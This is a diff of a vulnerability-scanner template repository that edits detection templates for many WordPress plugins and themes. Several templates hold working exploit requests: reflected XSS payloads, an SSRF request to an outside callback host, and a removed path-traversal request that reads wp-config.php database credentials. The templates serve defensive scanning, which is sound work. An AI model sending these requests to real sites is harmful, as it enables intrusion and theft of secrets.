-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/themes/altair/modules/"
+      - "{{BaseURL}}/wp-content/themes/altair/functions/"
+      - "{{BaseURL}}/wp-content/themes/altair/images/flip/"
+      - "{{BaseURL}}/wp-content/themes/altair/images/"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Index of"
+          - "wp-content/themes/altair"
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/vulnerabilities/wordpress/wp-ambience-xss.yaml b/vulnerabilities/wordpress/wp-ambience-xss.yaml
index 846c96eb86..40c9e68bfc 100644
--- a/vulnerabilities/wordpress/wp-ambience-xss.yaml
+++ b/vulnerabilities/wordpress/wp-ambience-xss.yaml
@@ -1,12 +1,19 @@
 id: wp-ambience-xss
 
 info:
-  name: WordPress Theme Ambience - 'src' Reflected Cross-Site Scripting (XSS)
+  name: WordPress Ambience Theme <=1.0 - Cross-Site Scripting
   author: daffainfo
   severity: medium
+  description: |
+    WordPress Ambience Theme 1.0 and earlier was affected by a cross-site scripting vulnerability.
   reference:
-    - https://www.exploit-db.com/exploits/38568
-  tags: wordpress,xss,wp-plugin
+    - https://www.exploit-db.com/expl oits/38568
+    - https://wpscan.com/vulnerability/c465e5c1-fe43-40e9-894a-97b8ac462381
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
+  tags: wp-plugin,wp,edb,wpscan,wordpress,xss
 
 requests:
   - method: GET
@@ -16,9 +23,9 @@ requests:
     matchers-condition: and
     matchers:
       - type: word
+        part: body
         words:
           - "<body onload=alert(1)>"
-        part: body
 
       - type: word
         part: header
@@ -28,3 +35,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/09/07
diff --git a/vulnerabilities/wordpress/wp-arforms-listing.yaml b/vulnerabilities/wordpress/wp-arforms-listing.yaml
index 32df4d1c94..9cc479667f 100644
--- a/vulnerabilities/wordpress/wp-arforms-listing.yaml
+++ b/vulnerabilities/wordpress/wp-arforms-listing.yaml
@@ -4,10 +4,10 @@ info:
   name: WordPress Plugin Arforms Listing
   author: pussycat0x
   severity: info
-  description: Searches for sensitive directories present in the wordpress-plugins plugin.
+  description: Searches for sensitive directories present in the arforms plugin.
   reference:
     - https://www.exploit-db.com/ghdb/6424
-  tags: wordpress,listing,plugin
+  tags: listing,plugin,edb,wordpress
 
 requests:
 
diff --git a/vulnerabilities/wordpress/wp-blogroll-fun-xss.yaml b/vulnerabilities/wordpress/wp-blogroll-fun-xss.yaml
new file mode 100644
index 0000000000..9c1230c237
--- /dev/null
+++ b/vulnerabilities/wordpress/wp-blogroll-fun-xss.yaml
@@ -0,0 +1,42 @@
+id: wp-blogroll-fun-xss
+
+info:
+  name: WordPress Blogroll Fun-Show Last Post and Last Update Time 0.8.4 - Cross-Site Scripting
+  author: DhiyaneshDK
+  severity: high
+  description: |
+    WordPress Plugin Blogroll Fun-Show Last Post and Last Update Time 0.8.4 and possibly prior versions are prone to a cross-site scripting vulnerability because of a failure to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  remediation: Update to plugin version 0.8.5 or later.
+  reference:
+    - https://codevigilant.com/disclosure/wp-plugin-blogroll-fun-a3-cross-site-scripting-xss/
+    - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-blogroll-fun-show-last-post-and-last-update-time-cross-site-scripting-0-8-4/
+  metadata:
+    verified: true
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
+    cvss-score: 7.2
+    cwe-id: CWE-79
+  tags: wordpress,wp-plugin,xss,unauth,wp
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/blogroll-fun/blogroll.php?k=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Got: <script>alert(document.domain)</script><br>'
+
+      - type: word
+        part: header
+        words:
+          - 'text/html'
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/09/07
diff --git a/vulnerabilities/wordpress/wp-church-admin-xss.yaml b/vulnerabilities/wordpress/wp-church-admin-xss.yaml
deleted file mode 100644
index dd400c14f6..0000000000
--- a/vulnerabilities/wordpress/wp-church-admin-xss.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: wp-church-admin-xss
-
-info:
-  name: WordPress Plugin church_admin - 'id' Reflected Cross-Site Scripting (XSS)
-  author: daffainfo
-  severity: medium
-  reference:
-    - https://packetstormsecurity.com/files/132034/WordPress-Church-Admin-0.800-Cross-Site-Scripting.html
-  tags: wordpress,xss,wp-plugin
-
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "</script><script>alert(document.domain)</script>"
-        part: body
-
-      - type: word
-        part: header
-        words:
-          - text/html
-
-      - type: status
-        status:
-          - 200
diff --git a/vulnerabilities/wordpress/wp-custom-tables-xss.yaml b/vulnerabilities/wordpress/wp-custom-tables-xss.yaml
index 6802b267d6..043b58de41 100644
--- a/vulnerabilities/wordpress/wp-custom-tables-xss.yaml
+++ b/vulnerabilities/wordpress/wp-custom-tables-xss.yaml
@@ -1,13 +1,13 @@
 id: wp-custom-tables-xss
 
 info:
-  name: WordPress Custom Tables Plugin 3.4.4 - Reflected Cross Site Scripting (XSS)
+  name: WordPress Custom Tables Plugin 3.4.4 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: WordPress custom tables Plugin 'key' Parameter Cross Site Scripting Vulnerability
   reference:
     - https://wpscan.com/vulnerability/211a4286-4747-4b62-acc3-fd9a57b06252
-  tags: wordpress,xss,wp-plugin
+  tags: wpscan,wordpress,xss,wp-plugin
 
 requests:
   - method: GET
diff --git a/vulnerabilities/wordpress/wp-email-subscribers-listing.yaml b/vulnerabilities/wordpress/wp-email-subscribers-listing.yaml
index 09ba092ece..631852c616 100644
--- a/vulnerabilities/wordpress/wp-email-subscribers-listing.yaml
+++ b/vulnerabilities/wordpress/wp-email-subscribers-listing.yaml
@@ -4,10 +4,10 @@ info:
   name: WordPress Plugin Email Subscribers Listing
   author: pussycat0x
   severity: low
-  description: Searches for sensitive directories present in the wordpress-plugins plugin.
+  description: Searches for sensitive directories present in the email-subscribers plugin.
   reference:
     - https://www.exploit-db.com/ghdb/6428
-  tags: wordpress,listing,plugin
+  tags: wordpress,listing,plugin,edb
 
 requests:
 
diff --git a/vulnerabilities/wordpress/wp-finder-xss.yaml b/vulnerabilities/wordpress/wp-finder-xss.yaml
index 1742028640..2ff57c78e0 100644
--- a/vulnerabilities/wordpress/wp-finder-xss.yaml
+++ b/vulnerabilities/wordpress/wp-finder-xss.yaml
@@ -1,12 +1,12 @@
 id: wp-finder-xss
 
 info:
-  name: WordPress Plugin Finder - 'order' Reflected Cross-Site Scripting (XSS)
+  name: WordPress Plugin Finder - 'order' Cross-Site Scripting
   author: daffainfo
   severity: medium
   reference:
     - https://packetstormsecurity.com/files/115902/WordPress-Finder-Cross-Site-Scripting.html
-  tags: wordpress,xss,wp-plugin
+  tags: xss,wp-plugin,packetstorm,wordpress
 
 requests:
   - method: GET
diff --git a/vulnerabilities/wordpress/wp-flagem-xss.yaml b/vulnerabilities/wordpress/wp-flagem-xss.yaml
index 98183da5f2..7ea55c8caf 100644
--- a/vulnerabilities/wordpress/wp-flagem-xss.yaml
+++ b/vulnerabilities/wordpress/wp-flagem-xss.yaml
@@ -1,12 +1,12 @@
 id: wp-flagem-xss
 
 info:
-  name: WordPress Plugin FlagEm - Reflected Cross-Site Scripting (XSS)
+  name: WordPress Plugin FlagEm - Cross-Site Scripting
   author: daffainfo
   severity: medium
   reference:
     - https://www.exploit-db.com/exploits/38674
-  tags: wordpress,xss,wp-plugin
+  tags: wordpress,xss,wp-plugin,edb
 
 requests:
   - method: GET
diff --git a/vulnerabilities/wordpress/wp-grimag-open-redirect.yaml b/vulnerabilities/wordpress/wp-grimag-open-redirect.yaml
index e100c092a2..71fcf22a06 100644
--- a/vulnerabilities/wordpress/wp-grimag-open-redirect.yaml
+++ b/vulnerabilities/wordpress/wp-grimag-open-redirect.yaml
@@ -7,15 +7,15 @@ info:
   description: The Grimag WordPress theme was affected by an Open Redirection security vulnerability.
   reference:
     - https://wpscan.com/vulnerability/db319d4c-7de6-4d36-90e9-86de82e9c03a
-  tags: wordpress,wp-theme,redirect
+  tags: wp-theme,redirect,wpscan,wordpress
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/wp-content/themes/Grimag/go.php?https://example.com"
+      - "{{BaseURL}}/wp-content/themes/Grimag/go.php?https://interact.sh"
 
     matchers:
       - type: regex
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
         part: header
diff --git a/vulnerabilities/wordpress/wp-haberadam-idor.yaml b/vulnerabilities/wordpress/wp-haberadam-idor.yaml
index c8001614ba..986f377396 100644
--- a/vulnerabilities/wordpress/wp-haberadam-idor.yaml
+++ b/vulnerabilities/wordpress/wp-haberadam-idor.yaml
@@ -7,7 +7,7 @@ info:
   reference:
     - https://cxsecurity.com/issue/WLB-2021090078
   metadata:
-    google-dork: inurl:/wp-content/themes/haberadam/
+    google-query: inurl:/wp-content/themes/haberadam/
   tags: wordpress,idor,wp-theme,disclosure
 
 requests:
diff --git a/vulnerabilities/wordpress/wp-idx-broker-platinum-listing.yaml b/vulnerabilities/wordpress/wp-idx-broker-platinum-listing.yaml
index b1b829e9e2..8a12b72001 100644
--- a/vulnerabilities/wordpress/wp-idx-broker-platinum-listing.yaml
+++ b/vulnerabilities/wordpress/wp-idx-broker-platinum-listing.yaml
@@ -4,10 +4,10 @@ info:
   name: WordPress Plugin Idx Broker Platinum Listing
   author: pussycat0x
   severity: info
-  description: Searches for sensitive directories present in the wordpress-plugins plugin.
+  description: Searches for sensitive directories present in the idx-broker-platinum plugin.
   reference:
     - https://www.exploit-db.com/ghdb/6416
-  tags: wordpress,listing,plugin
+  tags: plugin,edb,wordpress,listing
 
 requests:
 
diff --git a/vulnerabilities/wordpress/wp-insert-php-xss.yaml b/vulnerabilities/wordpress/wp-insert-php-xss.yaml
new file mode 100644
index 0000000000..989775584e
--- /dev/null
+++ b/vulnerabilities/wordpress/wp-insert-php-xss.yaml
@@ -0,0 +1,46 @@
+id: wp-insert-php-xss
+
+info:
+  name: Woody Code Snippets < 2.4.6 - Cross-Site Scripting
+  author: Akincibor,DhiyaneshDk
+  severity: medium
+  description: The plugin does not escape a generated URLs before outputting them back in an attribute, leading to Reflected Cross-Site Scripting
+  reference:
+    - https://wpscan.com/vulnerability/6d6761b7-0c17-4428-8748-2179732030a3
+  metadata:
+    verified: true
+  tags: xss,wp,wordpress,authenticated,woody,wpscan,wp-plugin
+
+requests:
+  - raw:
+      - |
+        POST /wp-login.php HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{RootURL}}
+        Content-Type: application/x-www-form-urlencoded
+        Cookie: wordpress_test_cookie=WP%20Cookie%20check
+
+        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
+
+      - |
+        GET /wp-admin/edit.php?post_type=wbcr-snippets&page=import-wbcr_insert_php&a"><script>alert(1)</script> HTTP/1.1
+        Host: {{Hostname}}
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'import-wbcr_insert_php&a\"><script>alert(1)</script>"'
+          - 'Woody Code Snippets Import'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/vulnerabilities/wordpress/wp-iwp-client-listing.yaml b/vulnerabilities/wordpress/wp-iwp-client-listing.yaml
index 22f7ad9dc8..28e9d6838c 100644
--- a/vulnerabilities/wordpress/wp-iwp-client-listing.yaml
+++ b/vulnerabilities/wordpress/wp-iwp-client-listing.yaml
@@ -4,10 +4,10 @@ info:
   name: WordPress Plugin Iwp-client Listing
   author: pussycat0x
   severity: info
-  description: Searches for sensitive directories present in the wordpress-plugins plugin.
+  description: Searches for sensitive directories present in the iwp-client plugin.
   reference:
     - https://www.exploit-db.com/ghdb/6427
-  tags: wordpress,listing,plugin
+  tags: wordpress,listing,plugin,edb
 
 requests:
   - method: GET
diff --git a/vulnerabilities/wordpress/wp-javospot-lfi.yaml b/vulnerabilities/wordpress/wp-javospot-lfi.yaml
index 747c17bdeb..9e11f2640c 100644
--- a/vulnerabilities/wordpress/wp-javospot-lfi.yaml
+++ b/vulnerabilities/wordpress/wp-javospot-lfi.yaml
@@ -1,15 +1,19 @@
 id: wp-javospot-lfi
 
 info:
-  name: Javo Spot Premium Theme - Unauthenticated Directory Traversal
+  name: WordPress Javo Spot Premium Theme - Local File Inclusion
   author: 0x_Akoko
   severity: high
-  description: A vulnerability in Javo Spot Premium Theme allows remote unauthenticated attackers access to locally stored file and return their content.
+  description: WordPress Javo Spot Premium Theme is vulnerable to local file inclusion that allows remote unauthenticated attackers access to locally stored file and return their content.
   reference:
     - https://codeseekah.com/2017/02/09/javo-themes-spot-lfi-vulnerability/
     - https://wpscan.com/vulnerability/2d465fc4-d4fa-43bb-9c0d-71dcc3ee4eab
     - https://themeforest.net/item/javo-spot-multi-purpose-directory-wordpress-theme/13198068
-  tags: wordpress,wp-theme,lfi,wp
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
+  tags: wordpress,wp-theme,lfi,wp,wpscan
 
 requests:
   - method: GET
@@ -28,3 +32,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/29
diff --git a/vulnerabilities/wordpress/wp-knews-xss.yaml b/vulnerabilities/wordpress/wp-knews-xss.yaml
index 3d4127b15c..8a5caa4568 100644
--- a/vulnerabilities/wordpress/wp-knews-xss.yaml
+++ b/vulnerabilities/wordpress/wp-knews-xss.yaml
@@ -1,11 +1,11 @@
 id: wp-knews-xss
 
 info:
-  name: WordPress Plugin Knews Multilingual Newsletters - Reflected Cross-Site Scripting (XSS)
+  name: WordPress Plugin Knews Multilingual Newsletters - Cross-Site Scripting
   author: daffainfo
   severity: medium
   reference:
-    - https://www.securityfocus.com/bid/54330/info
+    - http://web.archive.org/web/20210213220043/https://www.securityfocus.com/bid/54330/info
   tags: wordpress,xss,wp-plugin
 
 requests:
diff --git a/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml b/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml
index 78ea1bb313..e2e319f9aa 100644
--- a/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml
+++ b/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml
@@ -1,14 +1,18 @@
 id: wp-memphis-documents-library-lfi
 
 info:
-  name: WordPress Plugin Memphis Document Library 3.1.5 LFI
+  name: WordPress Memphis Document Library 3.1.5 - Local File Inclusion
   author: 0x_Akoko
   severity: high
-  description: Arbitrary file download in Memphis Document Library 3.1.5
+  description: WordPress Memphis Document Library 3.1.5 is vulnerable to local file inclusion.
   reference:
     - https://www.exploit-db.com/exploits/39593
     - https://wpscan.com/vulnerability/53999c06-05ca-44f1-b713-1e4d6b4a3f9f
-  tags: wordpress,wp-plugin,lfi
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
+  tags: wpscan,wordpress,wp-plugin,lfi,edb
 
 requests:
   - method: GET
@@ -28,3 +32,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/29
diff --git a/vulnerabilities/wordpress/wp-mstore-plugin-listing.yaml b/vulnerabilities/wordpress/wp-mstore-plugin-listing.yaml
index 3c8901d1d2..dc99e0ba8d 100644
--- a/vulnerabilities/wordpress/wp-mstore-plugin-listing.yaml
+++ b/vulnerabilities/wordpress/wp-mstore-plugin-listing.yaml
@@ -1,27 +1,27 @@
-id: wp-mstore-plugin-listing
+id: wp-mstore-plugin-listing
 
-info:
-  name: Wordpress Plugin MStore API
-  author: pussycat0x
-  severity: low
-  description: Searches for sensitive directories present in the wordpress-plugins plugin.
-  metadata:
-    google-dork: inurl:/wp-content/plugins/mstore-api/
-  tags: wordpress,listing,wp-plugin
+info:
+  name: Wordpress Plugin MStore API
+  author: pussycat0x
+  severity: low
+  description: Searches for sensitive directories present in the mstore-api plugin.
+  metadata:
+    google-query: inurl:/wp-content/plugins/mstore-api/
+  tags: wordpress,listing,wp-plugin
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/wp-content/plugins/mstore-api/"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "Index of"
-          - "/wp-content/plugins/mstore-api"
-        condition: and
-
-      - type: status
-        status:
-          - 200
\ No newline at end of file
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/mstore-api/"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Index of"
+          - "/wp-content/plugins/mstore-api"
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml b/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml
index 08f2810f63..a260d16be2 100644
--- a/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml
+++ b/vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml
@@ -7,7 +7,7 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/49327
     - https://wpscan.com/vulnerability/10417
-  tags: wordpress,rce,ssrf
+  tags: wordpress,rce,ssrf,edb,wpscan
 
 requests:
   - raw:
@@ -16,15 +16,15 @@ requests:
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 
-        action=epsilon_framework_ajax_action&args%5Baction%5D%5B%5D=Requests&args%5Baction%5D%5B%5D=request_multiple&args%5Bargs%5D%5B0%5D%5Burl%5D=http://example.com
+        action=epsilon_framework_ajax_action&args%5Baction%5D%5B%5D=Requests&args%5Baction%5D%5B%5D=request_multiple&args%5Bargs%5D%5B0%5D%5Burl%5D=http://interact.sh
 
     matchers-condition: and
     matchers:
       - type: word
-        words:
-          - "Example Domain"
-          - "protocol_version"
         part: body
+        words:
+          - "Interactsh Server"
+          - "protocol_version"
 
       - type: status
         status:
diff --git a/vulnerabilities/wordpress/wp-nextgen-xss.yaml b/vulnerabilities/wordpress/wp-nextgen-xss.yaml
index b6dd8865a7..77898ef069 100644
--- a/vulnerabilities/wordpress/wp-nextgen-xss.yaml
+++ b/vulnerabilities/wordpress/wp-nextgen-xss.yaml
@@ -1,11 +1,11 @@
 id: wp-nextgen-xss
 
 info:
-  name: WordPress Plugin NextGEN Gallery 1.9.10 - Reflected Cross-Site Scripting (XSS)
+  name: WordPress Plugin NextGEN Gallery 1.9.10 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   reference:
-    - https://www.securityfocus.com/bid/57200/info
+    - http://web.archive.org/web/20210123110617/https://www.securityfocus.com/bid/57200/info
   tags: wordpress,xss,wp-plugin
 
 requests:
diff --git a/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml b/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml
index 2621c00a21..f6fc60ba46 100644
--- a/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml
+++ b/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml
@@ -1,12 +1,16 @@
 id: wp-oxygen-theme-lfi
 
 info:
-  name: WordPress Oxygen-Theme - Arbitrary File Retrieval
+  name: WordPress Oxygen-Theme - Local File Inclusion
   author: 0x_Akoko
   severity: high
-  description: The WordPress Oxygen-Theme has a local file retrieval vulnerability in 'file' parameter of 'download.php'.
+  description: WordPress Oxygen-Theme has a local file inclusion vulnerability via the 'file' parameter of 'download.php'.
   reference:
     - https://cxsecurity.com/issue/WLB-2019030178
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-22
   tags: wordpress,wp-theme,lfi
 
 requests:
@@ -26,3 +30,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/29
diff --git a/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml b/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml
index 6deb475d0b..2d26b9e760 100644
--- a/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml
+++ b/vulnerabilities/wordpress/wp-phpfreechat-xss.yaml
@@ -1,11 +1,11 @@
 id: wp-phpfreechat-xss
 
 info:
-  name: WordPress Plugin PHPFreeChat - 'url' Reflected Cross-Site Scripting (XSS)
+  name: WordPress Plugin PHPFreeChat - 'url' Cross-Site Scripting
   author: daffainfo
   severity: medium
   reference:
-    - https://www.securityfocus.com/bid/54332/info
+    - http://web.archive.org/web/20210120061848/https://www.securityfocus.com/bid/54332/info
   tags: wordpress,xss,wp-plugin
 
 requests:
diff --git a/vulnerabilities/wordpress/wp-plugin-1-flashgallery-listing.yaml b/vulnerabilities/wordpress/wp-plugin-1-flashgallery-listing.yaml
index d4476cb5a1..41facd779d 100644
--- a/vulnerabilities/wordpress/wp-plugin-1-flashgallery-listing.yaml
+++ b/vulnerabilities/wordpress/wp-plugin-1-flashgallery-listing.yaml
@@ -1,28 +1,28 @@
-id: wp-plugin-1-flashgallery-listing
+id: wp-plugin-1-flashgallery-listing
 
-info:
-  name: WordPress 1 flash gallery listing
-  author: pussycat0x
-  severity: info
-  description: Searches for sensitive directories present in the wordpress-plugins plugin.
-  reference: https://www.exploit-db.com/ghdb/6978
-  tags: wordpress,listing
+info:
+  name: WordPress 1 flash gallery listing
+  author: pussycat0x
+  severity: info
+  description: Searches for sensitive directories present in the 1-flash-gallery plugin.
+  reference: https://www.exploit-db.com/ghdb/6978
+  tags: wordpress,listing
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/wp-content/plugins/1-flash-gallery/"
-      - "{{BaseURL}}/blog/wp-content/plugins/1-flash-gallery/"
-
-    stop-at-first-match: true
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "Index of"
-          - "/wp-content/plugins/1-flash-gallery"
-        condition: and
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/1-flash-gallery/"
+      - "{{BaseURL}}/blog/wp-content/plugins/1-flash-gallery/"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Index of"
+          - "/wp-content/plugins/1-flash-gallery"
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/vulnerabilities/wordpress/wp-plugin-lifterlms.yaml b/vulnerabilities/wordpress/wp-plugin-lifterlms.yaml
index 01b472a14f..0bdd0e3c5a 100644
--- a/vulnerabilities/wordpress/wp-plugin-lifterlms.yaml
+++ b/vulnerabilities/wordpress/wp-plugin-lifterlms.yaml
@@ -4,10 +4,10 @@ info:
   name: WordPress Plugin lifterlms Listing
   author: pussycat0x
   severity: info
-  description: Searches for sensitive directories present in the wordpress-plugins plugin.
+  description: Searches for sensitive directories present in the lifterlms plugin.
   reference:
     - https://www.exploit-db.com/ghdb/6420
-  tags: wordpress,listing,plugin
+  tags: wordpress,listing,plugin,edb
 
 requests:
   - method: GET
diff --git a/vulnerabilities/wordpress/wp-plugin-utlimate-member.yaml b/vulnerabilities/wordpress/wp-plugin-utlimate-member.yaml
index ef8c63ffec..a223eb525c 100644
--- a/vulnerabilities/wordpress/wp-plugin-utlimate-member.yaml
+++ b/vulnerabilities/wordpress/wp-plugin-utlimate-member.yaml
@@ -4,10 +4,10 @@ info:
   name: WordPress Plugin Ultimate Member
   author: pussycat0x
   severity: info
-  description: Searches for sensitive directories present in the wordpress-plugins plugin.
+  description: Searches for sensitive directories present in the ultimate-member plugin.
   reference:
     - https://www.exploit-db.com/ghdb/6998
-  tags: wordpress,listing,plugin
+  tags: wordpress,listing,plugin,edb
 
 requests:
   - method: GET
diff --git a/vulnerabilities/wordpress/wp-prostore-open-redirect.yaml b/vulnerabilities/wordpress/wp-prostore-open-redirect.yaml
index 820d21e476..f2bca586ab 100644
--- a/vulnerabilities/wordpress/wp-prostore-open-redirect.yaml
+++ b/vulnerabilities/wordpress/wp-prostore-open-redirect.yaml
@@ -7,15 +7,15 @@ info:
   description: The prostore WordPress theme was affected by an Open Redirection security vulnerability.
   reference:
     - https://wpscan.com/vulnerability/2e0f8b7f-96eb-443c-a553-550e42ec67dc
-  tags: wordpress,wp-theme,redirect
+  tags: wordpress,wp-theme,redirect,wpscan
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/wp-content/themes/prostore/go.php?https://example.com/"
+      - "{{BaseURL}}/wp-content/themes/prostore/go.php?https://interact.sh/"
 
     matchers:
       - type: regex
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
         part: header
\ No newline at end of file
diff --git a/vulnerabilities/wordpress/wp-qards-listing.yaml b/vulnerabilities/wordpress/wp-qards-listing.yaml
index e1c84b21a6..3c5a02fbb1 100644
--- a/vulnerabilities/wordpress/wp-qards-listing.yaml
+++ b/vulnerabilities/wordpress/wp-qards-listing.yaml
@@ -1,25 +1,25 @@
-id: wp-qards-listing
+id: wp-qards-listing
 
-info:
-  name: WordPress Plugin Qards
-  author: pussycat0x
-  severity: info
-  description: Searches for sensitive directories present in the wordpress-plugins plugin.
-  tags: wordpress,listing,wp-plugin,wp
+info:
+  name: WordPress Plugin Qards
+  author: pussycat0x
+  severity: info
+  description: Searches for sensitive directories present in the qards plugin.
+  tags: wordpress,listing,wp-plugin,wp
 
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/wp-content/plugins/qards/"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - "Index of"
-          - "/wp-content/plugins/qards"
-        condition: and
-
-      - type: status
-        status:
-          - 200
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/qards/"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Index of"
+          - "/wp-content/plugins/qards"
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/vulnerabilities/wordpress/wp-revslider-file-download.yaml b/vulnerabilities/wordpress/wp-revslider-file-download.yaml
deleted file mode 100644
index c5ea28f80a..0000000000
--- a/vulnerabilities/wordpress/wp-revslider-file-download.yaml
+++ /dev/null
@@ -1,33 +0,0 @@
-id: wp-revslider-file-download
-
-info:
-  name: Wordpress Revslider - Arbitrary File Retrieval
-  author: pussycat0x
-  severity: high
-  description: The Revslider WordPress plugin iss affected by an unauthenticated file retrieval vulnerability, which could result in attacker downloading the wp-config.php file.
-  reference:
-    - https://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html
-    - https://cxsecurity.com/issue/WLB-2021090129
-  metadata:
-    google-dork: inurl:/wp-content/plugins/revslider
-  tags: wordpress,wp-plugin,lfi,revslider
-
-requests:
-  - method: GET
-    path:
-      - '{{BaseURL}}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
-      - '{{BaseURL}}/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - "'DB_NAME'"
-          - "'DB_PASSWORD'"
-          - "'DB_USER'"
-        condition: and
-
-      - type: status
-        status:
-          - 200
diff --git a/vulnerabilities/wordpress/wp-securimage-xss.yaml b/vulnerabilities/wordpress/wp-securimage-xss.yaml
index 00842e4ba0..d60a1da844 100644
--- a/vulnerabilities/wordpress/wp-securimage-xss.yaml
+++ b/vulnerabilities/wordpress/wp-securimage-xss.yaml
@@ -1,11 +1,11 @@
 id: wp-securimage-xss
 
 info:
-  name: WordPress Plugin Securimage-WP - 'siwp_test.php' Reflected Cross-Site Scripting (XSS)
+  name: WordPress Plugin Securimage-WP - 'siwp_test.php' Cross-Site Scripting
   author: daffainfo
   severity: medium
   reference:
-    - https://www.securityfocus.com/bid/59816/info
+    - http://web.archive.org/web/20210123054214/https://www.securityfocus.com/bid/59816/info
   tags: wordpress,xss,wp-plugin
 
 requests:
diff --git a/vulnerabilities/wordpress/wp-security-open-redirect.yaml b/vulnerabilities/wordpress/wp-security-open-redirect.yaml
index 6a14088004..98f1e3b08c 100644
--- a/vulnerabilities/wordpress/wp-security-open-redirect.yaml
+++ b/vulnerabilities/wordpress/wp-security-open-redirect.yaml
@@ -10,15 +10,15 @@ info:
     - https://wpscan.com/vulnerability/9898
   metadata:
     verified: true
-  tags: wp-plugin,redirect,wordpress,wp
+  tags: wp-plugin,redirect,wordpress,wp,wpscan
 
 requests:
   - method: GET
     path:
